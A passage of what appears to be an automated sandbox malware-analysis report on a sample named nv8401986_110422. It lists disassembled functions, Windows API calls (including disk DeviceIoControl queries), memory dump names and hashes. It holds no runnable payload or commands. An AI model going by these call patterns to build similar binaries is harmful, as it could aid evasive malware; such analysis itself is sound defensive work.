                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000000), ref: 0043BECD
                                                                                                                                                                                                          • PostMessageW.USER32(00000000,000007EA,-6A94B199), ref: 0043BEE1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentMessagePostProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3746246500-0
                                                                                                                                                                                                          • Opcode ID: 7f52f2361005956e86439741024540be1bea0c0612572e551007dcac9d56219e
                                                                                                                                                                                                          • Instruction ID: ec3803969fd76a2d153318d765950a9863157699229a36a10959b82e67e3d4cd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f52f2361005956e86439741024540be1bea0c0612572e551007dcac9d56219e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30216DB5904746EFD704CF58C944B9AFBF4FB59314F10879AE8189B381D7B5AA80CB80
                                                                                                                                                                                                          Function 00524F3B Relevance: 3.0, APIs: 2, Instructions: 39threadCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetLastError.KERNEL32(0058C738,00000010), ref: 00524F4E
                                                                                                                                                                                                          • RtlExitUserThread.NTDLL(00000000), ref: 00524F55
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorExitLastThreadUser
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1750398979-0
                                                                                                                                                                                                          • Opcode ID: 1760aa99205214cc0cbc84dde7c720361cfba70e49fda1c99eddbf060c4b64eb
                                                                                                                                                                                                          • Instruction ID: 8d843416b46e8028c006474fb708ee0f01f7c30d8ac021810ef29603a0a13213
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1760aa99205214cc0cbc84dde7c720361cfba70e49fda1c99eddbf060c4b64eb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90F0AF79A442159FDB01AFB0E94EBAD7F70FF86700F200059F502AB2D2DBB469459BA0
                                                                                                                                                                                                          Function 00524FBA Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetLastError.KERNEL32(0058C758,00000010), ref: 00524FCD
                                                                                                                                                                                                          • RtlExitUserThread.NTDLL(00000000), ref: 00524FD4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorExitLastThreadUser
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1750398979-0
                                                                                                                                                                                                          • Opcode ID: 3715eeb7f0b305a3b4978c3ad29cbf0b9df5c3daa3be70cbfceebc7f510e8e4d
                                                                                                                                                                                                          • Instruction ID: fa2f67687b404eb9e07b3fc16445bf670b6ef6b3d6fbd87dd6228ab81ac475f1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3715eeb7f0b305a3b4978c3ad29cbf0b9df5c3daa3be70cbfceebc7f510e8e4d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AF0AF78940216AFDB01AFB0D94EAAD3F75FF86300F100058F402A72D2DB746945DBA0
                                                                                                                                                                                                          Function 0043B250 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004266E0: IsWindow.USER32(?), ref: 0042670D
                                                                                                                                                                                                            • Part of subcall function 0043BCD0: RtlInitializeCriticalSection.NTDLL(00598018), ref: 0043BD52
                                                                                                                                                                                                            • Part of subcall function 0043BCD0: __Init_thread_footer.LIBCMT ref: 0043BD6E
                                                                                                                                                                                                            • Part of subcall function 0043BCD0: RtlEnterCriticalSection.NTDLL ref: 0043BD89
                                                                                                                                                                                                            • Part of subcall function 0043BCD0: RtlLeaveCriticalSection.NTDLL(00598018), ref: 0043BE0F
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0043B27F
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0043B294
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$FreeLibrary$EnterInit_thread_footerInitializeLeaveWindow
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 552026310-0
                                                                                                                                                                                                          • Opcode ID: 71ce5e20c4c49b136f395b1bf2216a5d5f134c695108b71b8a23c1e5132f5a40
                                                                                                                                                                                                          • Instruction ID: 4facbffdcf2ef9bc607ffd8ecdd0104c3b147fd379a3cfe6e68b07f77938891c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71ce5e20c4c49b136f395b1bf2216a5d5f134c695108b71b8a23c1e5132f5a40
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98F08C702002048BD720AF6DD848B4773D8EB18318F04426DE899D7291DB79E844CBE8
                                                                                                                                                                                                          Function 0048D9E0 Relevance: 2.9, APIs: 2, Instructions: 421COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0048FC70: GetVersionExW.KERNEL32(00000114,00000000,00000000), ref: 0048FCB4
                                                                                                                                                                                                            • Part of subcall function 0048CC10: _Smanip.LIBCPMT ref: 0048CCA2
                                                                                                                                                                                                            • Part of subcall function 0048CE20: GetProcAddress.KERNEL32(?,?), ref: 0048CEBF
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,?,?,00000000), ref: 0048E064
                                                                                                                                                                                                            • Part of subcall function 0048D030: GetProcAddress.KERNEL32(00000003,00000000), ref: 0048D0E2
                                                                                                                                                                                                            • Part of subcall function 0048D030: GetProcAddress.KERNEL32(00000003,00000000), ref: 0048D135
                                                                                                                                                                                                            • Part of subcall function 0048D030: GetProcAddress.KERNEL32(00000003,00000000), ref: 0048D188
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 0048DD3F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$CloseHandle$SmanipVersion
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3547271121-0
                                                                                                                                                                                                          • Opcode ID: 8536385639c61c069b7032ae136035ad8fe04625cef40a3b0fb14e395b9001a7
                                                                                                                                                                                                          • Instruction ID: a0b3c337c60282dbc97f4e9ae1ff50e7de5d898d5da4cc5e22ee954b6bceaaae
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8536385639c61c069b7032ae136035ad8fe04625cef40a3b0fb14e395b9001a7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05126F70C052989AEB21EB64CD45BDEBBB4AF15308F0441EED44973282EB745F88DF66
                                                                                                                                                                                                          Function 0EC8A000 Relevance: 2.3, Strings: 1, Instructions: 1014COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3304984035.000000000EC80000.00000010.00000800.00020000.00000000.sdmp, Offset: 0EC80000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_ec80000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: Ak
                                                                                                                                                                                                          • API String ID: 0-1927009387
                                                                                                                                                                                                          • Opcode ID: baeab52ff20b606d9d5181e31515228b1b172ba8fb55112be2eead9d7027f536
                                                                                                                                                                                                          • Instruction ID: 9df8a95dfde42ab476b0e1e5bd448081eba8d0ce0165135b1aef33c98f282965
                                                                                                                                                                                                          • Opcode Fuzzy Hash: baeab52ff20b606d9d5181e31515228b1b172ba8fb55112be2eead9d7027f536
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC820070600200DFEB64DF45CB95F69B3A5FB84318F15854AE846AF386DB76EC82CB61
                                                                                                                                                                                                          Function 0048E6A0 Relevance: 1.9, APIs: 1, Instructions: 359COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: d384a54105181594b79476044d6aa024a063f870c2683b07cb67268f3f96c040
                                                                                                                                                                                                          • Instruction ID: 9a5173b79dcf5fcee6b3bef16d22e07dec158004a622286db5c0485b33b4da56
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d384a54105181594b79476044d6aa024a063f870c2683b07cb67268f3f96c040
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2E1DF71900218DEDB24EF65CC55BEEB7B9AF94304F0045EEE409A3181EB756B98CFA4
                                                                                                                                                                                                          Function 0B9C43AE Relevance: 1.8, Strings: 1, Instructions: 595COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3289071754.000000000B9C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0B9C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b9c0000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: "m
                                                                                                                                                                                                          • API String ID: 0-3580381498
                                                                                                                                                                                                          • Opcode ID: 110f1322153cc7939888e69fb36a51f2623d4c02e811b066511ea35c378b8632
                                                                                                                                                                                                          • Instruction ID: 7eb57b8fa9c336614d234ed37a42e148c88de4321efe888d5166abe29851bbb2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 110f1322153cc7939888e69fb36a51f2623d4c02e811b066511ea35c378b8632
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F32AA70E40314DFEB20CF84C9A8BAABBE5FB44714F15854AE9256B392C774AD41CF62
                                                                                                                                                                                                          Function 004343E0 Relevance: 1.8, APIs: 1, Instructions: 289windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PostMessageW.USER32(?,000004C9,00000000,00000000), ref: 004347D2
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessagePost
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 410705778-0
                                                                                                                                                                                                          • Opcode ID: 12a20019a821f82eb247c8438ef66c88040f8590510c5a3561366ca4b23a8708
                                                                                                                                                                                                          • Instruction ID: e9ea37627c4d635df0377ed9a0194fd3503de496be764e11cb72b02e3d1adf17
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12a20019a821f82eb247c8438ef66c88040f8590510c5a3561366ca4b23a8708
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AB10271500A409BE728DF38CD587EFBBE5EB85314F148A1DE0A68B7D0D779BA448B84
                                                                                                                                                                                                          Function 0047D780 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 7f3f9c59d712aed5ce851ea2227e667eee930213931a4cf3fd21720c8f36780c
                                                                                                                                                                                                          • Instruction ID: 78b60159e5e5ea34db5dde7ebfc99d8067667f457a194975a13af87b165f6d1b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f3f9c59d712aed5ce851ea2227e667eee930213931a4cf3fd21720c8f36780c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D5175B4D00209EFDB04DF95D891AEEBBB5FF48304F14812EE9156B391DB38AA05CB95
                                                                                                                                                                                                          Function 00481F30 Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetClientRect.USER32(00000000), ref: 00481F69
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ClientRect
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 846599473-0
                                                                                                                                                                                                          • Opcode ID: 88ec38587882752675255fd295883e8f47300495b378e8a4d17cfdbfefb5db08
                                                                                                                                                                                                          • Instruction ID: 54c4ab39923ec3a21dd1a0ca03ad16e45a7416c17a46c27eb8a9ab73405eb760
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88ec38587882752675255fd295883e8f47300495b378e8a4d17cfdbfefb5db08
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5415C70700205AFDB08DF68C894BAE7BA8EF4A304F10459EE906DF296D779ED44CB94
                                                                                                                                                                                                          Function 0048EA60 Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0048D960: InterlockedCompareExchange.KERNEL32(00597AA4,000000FF,00000000), ref: 0048D970
                                                                                                                                                                                                            • Part of subcall function 0048D960: InterlockedExchange.KERNEL32(00597AA4,00000001), ref: 0048D994
                                                                                                                                                                                                          • _Smanip.LIBCPMT ref: 0048EB31
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExchangeInterlocked$CompareSmanip
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2033401057-0
                                                                                                                                                                                                          • Opcode ID: 307831225377cf16af826ced24a3c2f1491a57b5d2b5f68c10f9d3bdd64363bc
                                                                                                                                                                                                          • Instruction ID: 8979d730f6f689733cf1e6aecc76e1f12f10f0e43a7ab11387706ed53f59f6ed
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 307831225377cf16af826ced24a3c2f1491a57b5d2b5f68c10f9d3bdd64363bc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7131AAB1D01218AAEB10EB55DC46FEDF7BCAB54704F4045AFF809B3282EB745A488B65
                                                                                                                                                                                                          Function 0051A1D0 Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 0051A298
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CallFilterFunc@8
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4062629308-0
                                                                                                                                                                                                          • Opcode ID: 4a244fbe3033f5dffa8c5b6d10f8c3621f5383b1e98ff1b43659d20e5ffa6478
                                                                                                                                                                                                          • Instruction ID: dede04c96bba394e56bd36ef60f03b63697670d26d7c8b798c5a6462bf491d70
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a244fbe3033f5dffa8c5b6d10f8c3621f5383b1e98ff1b43659d20e5ffa6478
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F22167B9A125125BFB1A6B789C0A3ED3F417F85330F244309E4319A1D1DB358AC28703
                                                                                                                                                                                                          Function 00470CA0 Relevance: 1.6, APIs: 1, Instructions: 71COMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: shared_ptr
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2025160788-0
                                                                                                                                                                                                          • Opcode ID: ad1d84adbe62c2a3fc6594ffc7629b53e481e42f8abe7adb84b7335e57babe46
                                                                                                                                                                                                          • Instruction ID: ec2113fe658bf09cafd9da037ea84c02bdd17992014a3213e00027296830378b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad1d84adbe62c2a3fc6594ffc7629b53e481e42f8abe7adb84b7335e57babe46
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE31F274D01209CFCB28CF99D845BEEBBB0BB48304F10892AD41AA7394D739A941CBA5
                                                                                                                                                                                                          Function 0048FC70 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetVersionExW.KERNEL32(00000114,00000000,00000000), ref: 0048FCB4
                                                                                                                                                                                                            • Part of subcall function 0048F380: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0048F410
                                                                                                                                                                                                            • Part of subcall function 0048F380: DeviceIoControl.KERNEL32(00000000,00074080,00000000,00000000,?,00000018,?,00000000), ref: 0048F459
                                                                                                                                                                                                            • Part of subcall function 0048FA50: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0048FAE0
                                                                                                                                                                                                            • Part of subcall function 0048FA50: DeviceIoControl.KERNEL32(00000000,0004D008,?,0000003C,?,0000022D,?,00000000), ref: 0048FB7F
                                                                                                                                                                                                            • Part of subcall function 0048F7E0: CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0048F85D
                                                                                                                                                                                                            • Part of subcall function 0048F7E0: DeviceIoControl.KERNEL32(00000000,002D1400,00000000,0000000C,?,00000800,00000000,00000000), ref: 0048F8D0
